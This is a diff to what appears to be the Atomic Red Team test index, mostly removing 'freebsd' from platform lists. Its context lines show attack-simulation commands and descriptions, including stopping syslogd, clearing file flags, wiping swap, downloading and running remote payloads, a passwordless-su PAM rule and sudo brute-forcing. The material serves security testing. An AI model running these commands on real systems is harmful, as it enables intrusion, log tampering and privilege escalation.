- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -7999,7 +7992,6 @@ defense-evasion:
|
||||
description: "Use Perl to decode a base64-encoded text string and echo it to
|
||||
the console \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -8067,7 +8059,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
message:
|
||||
description: Message to print to the screen
|
||||
@@ -8098,7 +8090,7 @@ defense-evasion:
|
||||
Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
|
||||
for it. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
bash_encoded:
|
||||
description: Encoded
|
||||
@@ -8141,7 +8133,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -9755,7 +9746,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -9787,7 +9777,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -9822,7 +9811,6 @@ defense-evasion:
|
||||
Setting the creation timestamp requires changing the system clock and reverting.
|
||||
Sudo or root privileges are required to change date. Use with caution.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -9849,7 +9837,6 @@ defense-evasion:
|
||||
|
||||
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -11175,7 +11162,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if pfctl is installed on the machine.
|
||||
@@ -11283,7 +11270,7 @@ defense-evasion:
|
||||
description: "Add and delete a rule on the Packet Filter (PF) if installed and
|
||||
enabled. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if pf is installed on the machine and enabled.
|
||||
@@ -13706,9 +13693,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -13741,9 +13727,8 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
file_to_pad:
|
||||
description: Path of binary to be padded
|
||||
@@ -14938,7 +14923,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
payload:
|
||||
description: hello.c payload
|
||||
@@ -14986,7 +14971,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetUID flag
|
||||
@@ -15031,7 +15016,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetGID flag
|
||||
@@ -15100,7 +15085,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -4000
|
||||
@@ -15114,7 +15098,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -2000
|
||||
@@ -16041,7 +16024,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
auditd_config_file_name:
|
||||
description: The name of the auditd configuration file to be changed
|
||||
@@ -16105,7 +16088,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
syslog_config_file_name:
|
||||
description: The name of the syslog configuration file to be changed
|
||||
@@ -18898,7 +18881,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
evil_command:
|
||||
description: Command to run after shell history collection is disabled
|
||||
@@ -18997,7 +18980,7 @@ defense-evasion:
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -19036,7 +19019,7 @@ defense-evasion:
|
||||
|
||||
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -20688,7 +20671,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
service syslogd stop
|
||||
@@ -21582,7 +21565,6 @@ defense-evasion:
|
||||
as an additional \npayload to the compromised host and to make sure that there
|
||||
will be no recoverable data due to swap feature of FreeBSD/linux.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: "swapon -a \nsleep 2\nswapoff -a\nsync\n"
|
||||
@@ -22425,7 +22407,7 @@ defense-evasion:
|
||||
a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand
|
||||
uname -v\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
shell_command:
|
||||
description: command to encode
|
||||
@@ -23742,7 +23724,6 @@ defense-evasion:
|
||||
|
||||
Upon successful execution, sh is renamed to `crond` and executed.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
@@ -24702,7 +24683,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
cert_filename:
|
||||
description: Path of the CA certificate we create
|
||||
@@ -25021,7 +25002,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -25053,7 +25033,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -25084,7 +25063,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -27350,7 +27328,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -27388,7 +27365,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -27577,7 +27553,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: |
|
||||
chflags -R 0 /
|
||||
@@ -28397,7 +28373,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
command: "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir
|
||||
@@ -29406,7 +29382,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -31261,7 +31236,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -31302,7 +31277,7 @@ defense-evasion:
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -31344,7 +31319,7 @@ defense-evasion:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -33926,7 +33901,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -33965,7 +33940,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -34004,7 +33979,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if sudo is installed.
|
||||
@@ -35196,9 +35171,8 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -35256,7 +35230,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -38063,7 +38037,7 @@ privilege-escalation:
|
||||
Launch bash shell with command arg to create TRAP on EXIT.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
@@ -38106,7 +38080,7 @@ privilege-escalation:
|
||||
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
@@ -38865,7 +38839,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
payload:
|
||||
description: hello.c payload
|
||||
@@ -38913,7 +38887,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetUID flag
|
||||
@@ -38958,7 +38932,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
file_to_setuid:
|
||||
description: Path of file to set SetGID flag
|
||||
@@ -39027,7 +39001,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -4000
|
||||
@@ -39041,7 +39014,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
command: 'find /usr/bin -perm -2000
|
||||
@@ -43596,7 +43568,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command_to_add:
|
||||
description: Command to add to the .shrc file
|
||||
@@ -43617,7 +43589,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -43640,7 +43611,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -45568,7 +45538,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -45864,7 +45834,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
rc_service_path:
|
||||
description: Path to rc service file
|
||||
@@ -47322,7 +47292,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
@@ -47866,7 +47836,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -47907,7 +47877,7 @@ privilege-escalation:
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -47949,7 +47919,7 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -50010,9 +49980,8 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -50070,7 +50039,7 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -53084,7 +53053,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -53109,7 +53077,6 @@ execution:
|
||||
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -53203,7 +53170,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -53223,7 +53189,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -53241,7 +53206,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -53256,7 +53220,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -53290,7 +53253,7 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -53337,7 +53300,7 @@ execution:
|
||||
with a /bin/sh shell, changes the users shell to sh, then deletes the art
|
||||
user. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'chsh - change login shell, must be installed
|
||||
|
||||
@@ -53389,7 +53352,7 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -53450,7 +53413,7 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
remote_url:
|
||||
description: url of remote payload
|
||||
@@ -54089,7 +54052,6 @@ execution:
|
||||
description: Download and execute shell script and write to file then execute
|
||||
locally using Python -c (command mode)
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
script_url:
|
||||
@@ -54131,7 +54093,6 @@ execution:
|
||||
description: Create Python file (.py) that downloads and executes shell script
|
||||
via executor arguments
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
python_script_name:
|
||||
@@ -54189,7 +54150,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
python_script_name:
|
||||
@@ -54254,7 +54214,6 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: 'Verify if python is in the environment variable path and attempt
|
||||
@@ -55573,7 +55532,7 @@ execution:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
@@ -56632,7 +56591,7 @@ persistence:
|
||||
|
||||
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_pam_conf:
|
||||
description: PAM config file to modify.
|
||||
@@ -58667,9 +58626,8 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -58727,7 +58685,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command:
|
||||
description: Command to execute
|
||||
@@ -60348,7 +60306,6 @@ persistence:
|
||||
description: Turn on Chrome/Chromium developer mode and Load Extension found
|
||||
in the src directory
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -60366,7 +60323,6 @@ persistence:
|
||||
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
|
||||
description: Install the "Minimum Viable Malicious Extension" Chrome extension
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -60383,7 +60339,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- windows
|
||||
- macos
|
||||
@@ -62672,7 +62627,7 @@ persistence:
|
||||
Launch bash shell with command arg to create TRAP on EXIT.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
@@ -62715,7 +62670,7 @@ persistence:
|
||||
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
|
||||
The trap executes script that writes to /tmp/art-fish.txt
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'Check if bash is installed.
|
||||
@@ -63061,7 +63016,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
username:
|
||||
description: Username of the user to create
|
||||
@@ -63184,7 +63139,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
username:
|
||||
description: Username of the user to create
|
||||
@@ -64042,9 +63997,8 @@ persistence:
|
||||
persistence on victim host. \nIf the user is able to save the same contents
|
||||
in the authorized_keys file, it shows user can modify the file.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -70371,7 +70325,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
command_to_add:
|
||||
description: Command to add to the .shrc file
|
||||
@@ -70392,7 +70346,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -70415,7 +70368,6 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
text_to_append:
|
||||
@@ -72694,7 +72646,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -73032,7 +72984,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
rc_service_path:
|
||||
description: Path to rc service file
|
||||
@@ -74533,7 +74485,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
@@ -75168,7 +75120,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -75209,7 +75161,7 @@ persistence:
|
||||
the account, try to su to art and fail, unlock and renew the account, su successfully,
|
||||
then delete the account.\n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -75251,7 +75203,7 @@ persistence:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: true
|
||||
@@ -75631,7 +75583,7 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
destination_url:
|
||||
description: Destination URL to post encoded data.
|
||||
@@ -77896,7 +77848,7 @@ command-and-control:
|
||||
with add-ons in order to provide onion routing functionality.\nUpon successful
|
||||
execution, the tor proxy service will be launched. \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: "Tor must be installed on the machine \n"
|
||||
@@ -78050,7 +78002,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -78810,7 +78761,6 @@ command-and-control:
|
||||
This test simulates an infected host beaconing to command and control.
|
||||
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -78899,7 +78849,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -78939,7 +78888,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -78978,7 +78926,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -79009,7 +78956,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -79040,7 +78986,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -79071,7 +79016,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -79280,7 +79224,6 @@ command-and-control:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -79937,9 +79880,8 @@ command-and-control:
|
||||
|
||||
Note that this test may conflict with pre-existing system configuration.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
proxy_server:
|
||||
description: Proxy server URL (host:port)
|
||||
@@ -80502,7 +80444,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -80532,7 +80473,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -80569,9 +80509,8 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- macos
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
test_folder:
|
||||
description: Path used to store files.
|
||||
@@ -80789,7 +80728,7 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file path
|
||||
@@ -80851,7 +80790,7 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Output file path
|
||||
@@ -81207,7 +81146,7 @@ collection:
|
||||
syslog.\n\nTo gain persistence the command could be added to the users .shrc
|
||||
or .profile \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'This test requires to be run in a bash shell and that logger
|
||||
@@ -81241,7 +81180,6 @@ collection:
|
||||
persistence the command could be added to the users .bashrc or .bash_aliases
|
||||
or the systems default .bashrc in /etc/skel/ \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
@@ -81828,7 +81766,7 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
output_file:
|
||||
description: Location to save downloaded discovery.bat file
|
||||
@@ -82719,7 +82657,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -82756,7 +82693,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -82793,7 +82729,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -82830,7 +82765,6 @@ collection:
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_input_file:
|
||||
@@ -87659,7 +87593,7 @@ credential-access:
|
||||
|
||||
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
input_arguments:
|
||||
path_to_pam_conf:
|
||||
description: PAM config file to modify.
|
||||
@@ -87935,7 +87869,7 @@ credential-access:
|
||||
syslog.\n\nTo gain persistence the command could be added to the users .shrc
|
||||
or .profile \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
- description: 'This test requires to be run in a bash shell and that logger
|
||||
@@ -87969,7 +87903,6 @@ credential-access:
|
||||
persistence the command could be added to the users .bashrc or .bash_aliases
|
||||
or the systems default .bashrc in /etc/skel/ \n"
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependency_executor_name: sh
|
||||
dependencies:
|
||||
@@ -88448,7 +88381,7 @@ credential-access:
|
||||
the sudo_bruteforce.sh which brute force guesses the password, then deletes
|
||||
